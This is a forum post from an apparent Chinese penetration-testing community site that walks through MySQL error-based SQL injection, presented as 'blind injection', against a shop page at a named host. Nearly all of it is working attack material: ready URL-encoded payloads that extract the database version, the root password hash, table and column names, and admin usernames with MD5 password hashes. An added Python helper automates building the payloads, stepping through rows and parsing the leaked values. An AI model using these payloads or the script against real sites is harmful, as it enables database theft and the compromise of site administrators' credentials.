中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Detailed blind injection content

Author: admin    Time: 2012-9-5 14:59
Determine the version number
(Every payload in this post is MySQL error-based injection rather than true blind injection: the value to be leaked is wrapped in concat(..., 0x3a, floor(rand()*2)), the result is grouped on, and MySQL re-evaluates rand() when it inserts the key into the GROUP BY temporary table, so the insert collides and the server reports the value itself in the error text "Duplicate entry '<value>:1' for key 'group_key'". With an unseeded rand() over only two rows (select 1 union select 2), as used here, the collision happens only on a fraction of requests, roughly one in four, so the page may need to be reloaded; the seeded rand(0) over information_schema.tables in the last section (报错注射, error-based injection) fails on every request.)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Determine the operating system (@@version_compile_os)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash (the Password column of mysql.user, where char(114,111,111,116) spells 'root' without quote characters; this only works when the injected connection has SELECT on the mysql database, and on MySQL 5.7 and later the column is named authentication_string)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table names (char(115,97,110,115,97,110,49) spells 'sansan1', the database name from the previous step; limit 6,1 returns the seventh table, so step the offset 0,1 / 1,1 / 2,1 ... to list the tables one at a time)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database user_name column (char(101,99,115,95,97,100,109,105,110,95,117,115,101,114) spells 'ecs_admin_user', the table found above; limit 2,1 returns its third column)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database password column (same query, limit 4,1 returns the fifth column)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Obtain the admin passwd (md5): password and user_name from sansan1.ecs_admin_user are joined with char(94) ('^') so both come back in one error message; limit 0,1 returns the first admin row, and stepping the offset returns the others

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection
(The same duplicate-key trick written for two other injection contexts. The first two payloads sit in a UNION position: uid = -1 empties the legitimate result so only the injected row is evaluated. The third is appended with and(...) to an existing WHERE clause. In all three the grouped rows come from information_schema.tables, which always has more than two rows, and rand(0) is seeded, so the sequence of floor(rand(0)*2) values is fixed (it begins 0,1,1,0,1,1) and the key collision is raised on every request instead of only sometimes. The 0x7e,0x27 (~') delimiters in the third payload mark the leaked value inside the error text, and limit 21,1 on information_schema.SCHEMATA reads the 22nd database name; step the offset to list them all.)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
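A small extraction helper for the technique in this post, added here as an example; it is not part of the original post and not the code of any tool the post mentions. It builds the seeded rand(0) form of the payload against the URL shape used above (the host and parameter names are taken from the post's URLs only as an assumed injection point), encodes strings as char(...) the way the post does, walks limit offsets one row at a time, and pulls the leaked value out of the MySQL "Duplicate entry" text. The fake_fetch stand-in and its table list are constructed so the script runs offline; against a real target you are authorised to test, replace it with an HTTP client.

```python
import re
from typing import Callable, Iterator, List, Optional
from urllib.parse import quote

# Assumed injection point, taken from the URL shape in the post; hypothetical host.
BASE_URL = "http://www.baiud.com/goods.php?id=352&wsid=1"

# MySQL names the colliding GROUP BY key verbatim in the error, e.g.
#   Duplicate entry '~5.5.28-log~1' for key 'group_key'
# (MySQL 8 writes the key as '<group_key>'); the ~ delimiters come from 0x7e in the payload.
LEAK_RE = re.compile(r"Duplicate entry '~(.*)~[01]' for key '<?group_key>?'")


def to_char(s: str) -> str:
    """Encode a string as char(...) so the payload needs no quote characters
    (the post encodes 'root', 'sansan1' and 'ecs_admin_user' this way)."""
    return "char(" + ",".join(str(b) for b in s.encode()) + ")"


def build_payload(expr: str) -> str:
    """Wrap a scalar subquery in the duplicate-key trick. rand(0) is seeded and
    information_schema.tables always has more than two rows, so the collision is
    deterministic, unlike the unseeded rand() over two rows used earlier in the post.
    The error message truncates the key, so chunk long values with substring()."""
    return (
        "and(select 1 from(select count(*),concat(0x7e,(" + expr + "),0x7e,"
        "floor(rand(0)*2))x from information_schema.tables group by x)a)"
    )


def build_url(expr: str) -> str:
    """Append the URL-encoded payload to the assumed injection point."""
    return BASE_URL + "%20" + quote(build_payload(expr), safe="(),*=")


def parse_leak(body: str) -> Optional[str]:
    """Return the value leaked through the error message, or None when the page
    rendered normally (offset past the last row, or the trick did not fire)."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def enumerate_values(expr_template: str, fetch: Callable[[str], str],
                     max_rows: int = 200) -> Iterator[str]:
    """Walk `limit n,1` offsets until no value comes back, the way the post steps
    through table names (limit 6,1) and column names (limit 2,1 / limit 4,1).
    expr_template must contain an {n} placeholder for the offset."""
    for n in range(max_rows):
        value = parse_leak(fetch(build_url(expr_template.format(n=n))))
        if value is None:
            return
        yield value


def table_names(db: str, fetch: Callable[[str], str]) -> List[str]:
    """List the tables of database `db`, one error message per table."""
    expr = ("select TABLE_NAME from information_schema.tables "
            "where TABLE_SCHEMA=" + to_char(db) + " limit {n},1")
    return list(enumerate_values(expr, fetch))


# Constructed stand-in for the vulnerable page: it answers the offset found in the
# payload with the error text a real MySQL-backed page would return, using a
# made-up table list. Not a real server.
FAKE_TABLES = ["ecs_admin_user", "ecs_goods", "ecs_users"]
_OFFSET_RE = re.compile(r"limit%20(\d+),1")


def fake_fetch(url: str) -> str:
    m = _OFFSET_RE.search(url)
    n = int(m.group(1)) if m else 0
    if n < len(FAKE_TABLES):
        return ("<b>Error:</b> Duplicate entry '~" + FAKE_TABLES[n]
                + "~1' for key 'group_key'")
    return "<html><body>goods page rendered normally</body></html>"


if __name__ == "__main__":
    print(build_url("select @@version"))
    print(table_names("sansan1", fake_fetch))
```

The offset walk stops at the first response without an error, which is also what happens on a real target when the LIMIT offset runs past the last row: the subquery yields NULL, concat() becomes NULL for every grouped row, and no key collision occurs.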




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2